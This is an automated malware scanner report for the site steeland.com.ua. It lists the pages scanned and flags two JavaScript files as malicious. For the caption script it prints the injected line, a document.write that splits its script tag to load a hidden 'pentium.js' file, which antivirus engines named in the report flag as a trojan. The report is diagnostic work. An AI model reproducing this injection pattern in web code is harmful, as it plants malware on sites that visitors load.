New scan:

Malware Scanner report for steeland.com.ua

Malicious/Suspicious/Total urls checked
2/0/23
2 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.steeland.com.ua/
HTTP/1.1 302 Found
Connection: close
Date: Sun, 26 Apr 2015 03:23:56 GMT
Location: http://www.steeland.com.ua/html/
Server: nginx admin
Content-Length: 216
Content-Type: text/html; charset=iso-8859-1
X-Cache: HIT from Backend
clean
http://www.steeland.com.ua/html/
200 OK
Content-Length: 27188
Content-Type: text/html
clean
http://www.steeland.com.ua/html/cache/template/mootools-c1533987.js
200 OK
Content-Length: 74305
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var MooTools={version:'1.12'};function $defined(obj){return(obj!=undefined);};function $type(obj){if(!$defined(obj))return false;if(obj.htmlElement)return'element';var type=typeof obj;if(type=='object'&&obj.nodeName){switch(obj.nodeType){case 1:return'element';case 3:return(/\S/).test(obj.nodeValue)?'textnode':'whitespace';}}
if(type=='object'||type=='function'){switch(obj.constructor){case Array:return'array';case RegExp:return'regexp';case Class:return'class';}
if(typeof obj.le
... 3100 bytes are skipped ...
;this.options.wait)||(index===this.previous&&!this.options.alwaysHide))return this;this.previous=index;var obj={};this.elements.each(function(el,i){obj[i]={};var hide=(i!=index)||(this.options.alwaysHide&&(el.offsetHeight>0));this.fireEvent(hide?'onBackground':'onActive',[this.togglers[i],el]);for(var fx in this.effects)obj[i][fx]=hide?0:el[this.effects[fx]];},this);return this.start(obj);},showThisHideOpen:function(index){return this.display(index);}});Fx.Accordion=Accordion;

Antivirus reports:

nProtect
Script/W32.Agent.AME

http://www.steeland.com.ua/html/cache/template/caption-be912474.js
200 OK
Content-Length: 1154
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

var JCaption=new Class({initialize:function(selector)
{this.selector=selector;var images=$$(selector);images.each(function(image){this.createCaption(image);},this);},createCaption:function(element)
{var caption=document.createTextNode(element.title);var container=document.createElement("div");var text=document.createElement("p");var width=element.getAttribute("width");var align=element.getAttribute("align");if(!width){width=element.width;}
if(!align)
align=element.getStyle("float
... 202 bytes are skipped ...
t);container.appendChild(element);if(element.title!=""){container.appendChild(text);}
container.className=this.selector.replace('.','_');container.className=container.className+" "+align;container.setAttribute("style","float:"+align);container.style.width=width+"px";}});document.caption=null;window.addEvent('load',function(){var caption=new JCaption('img.caption')
document.caption=caption});
;document.write("<scr"+"ipt src='/html/language/en-GB/pentium.js'><"+"/script>");

Antivirus reports:

Kaspersky
HEUR:Trojan.Script.Generic
Sophos
Mal/Iframe-AN

http://www.steeland.com.ua/html/cache/template/jquery-409821cc.js
200 OK
Content-Length: 93305
Content-Type: application/x-javascript
clean
http://www.steeland.com.ua/html/cache/template/widgetkit-43152e90-ec97da9e.js
200 OK
Content-Length: 12960
Content-Type: application/x-javascript
clean
http://www.steeland.com.ua/html/cache/template/template-5bc8d101.js
200 OK
Content-Length: 16186
Content-Type: application/x-javascript
clean
http://code.jquery.com/jquery-latest.js
200 OK
Content-Length: 282766
Content-Type: application/x-javascript
clean
http://www.steeland.com.ua/html
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 26 Apr 2015 03:23:59 GMT
Location: http://www.steeland.com.ua/html/
Server: nginx admin
Content-Length: 240
Content-Type: text/html; charset=iso-8859-1
X-Cache: HIT from Backend
clean
http://www.steeland.com.ua/test404page.js
404 Not Found
Content-Length: 331
Content-Type: text/html
clean
http://www.steeland.com.ua/html/productione
200 OK
Content-Length: 19850
Content-Type: text/html
clean
http://www.steeland.com.ua/html/productione/module-variations/2011-12-20-13-53-22
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 26 Apr 2015 03:24:00 GMT
Location: http://www.steeland.com.ua/html/kovka/listia/
Server: nginx admin
Content-Length: 253
Content-Type: text/html; charset=iso-8859-1
X-Cache: HIT from Backend
clean
http://www.steeland.com.ua/html/kovka/listia/
200 OK
Content-Length: 58901
Content-Type: text/html
clean
http://www.steeland.com.ua/html/productione/module-variations/piki
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 26 Apr 2015 03:24:01 GMT
Location: http://www.steeland.com.ua/html/kovka/piki
Server: nginx admin
Content-Length: 250
Content-Type: text/html; charset=iso-8859-1
X-Cache: HIT from Backend
clean
http://www.steeland.com.ua/html/kovka/piki
200 OK
Content-Length: 31561
Content-Type: text/html
clean
http://www.steeland.com.ua/html/productione/module-variations/piatki
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 26 Apr 2015 03:24:02 GMT
Location: http://www.steeland.com.ua/html/kovka/piatki/
Server: nginx admin
Content-Length: 253
Content-Type: text/html; charset=iso-8859-1
X-Cache: HIT from Backend
clean
http://www.steeland.com.ua/html/kovka/piatki/
200 OK
Content-Length: 23756
Content-Type: text/html
clean
http://www.steeland.com.ua/html/productione/module-variations/cvety
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 26 Apr 2015 03:24:02 GMT
Location: http://www.steeland.com.ua/html/kovka/cvety
Server: nginx admin
Content-Length: 251
Content-Type: text/html; charset=iso-8859-1
X-Cache: HIT from Backend
clean
http://www.steeland.com.ua/html/kovka/cvety
200 OK
Content-Length: 33948
Content-Type: text/html
clean
http://www.steeland.com.ua/html/productione/module-variations/shary
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 26 Apr 2015 03:24:03 GMT
Location: http://www.steeland.com.ua/html/kovka/shary/
Server: nginx admin
Content-Length: 252
Content-Type: text/html; charset=iso-8859-1
X-Cache: HIT from Backend
clean
http://www.steeland.com.ua/html/kovka/shary/
200 OK
Content-Length: 19230
Content-Type: text/html
clean
http://www.steeland.com.ua/html/productione/module-variations/sharypolye
HTTP/1.1 301 Moved Permanently
Connection: close
Date: Sun, 26 Apr 2015 03:24:04 GMT
Location: http://www.steeland.com.ua/html/kovka/sharypolye
Server: nginx admin
Content-Length: 256
Content-Type: text/html; charset=iso-8859-1
X-Cache: HIT from Backend
clean
http://www.steeland.com.ua/html/kovka/sharypolye
200 OK
Content-Length: 16827
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: steeland.com.ua

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: steeland.com.ua
Referer: http://www.google.com/search?q=steeland.com.ua

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=steeland.com.ua

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://steeland.com.ua/

Result: steeland.com.ua is not infected or malware details are not published yet.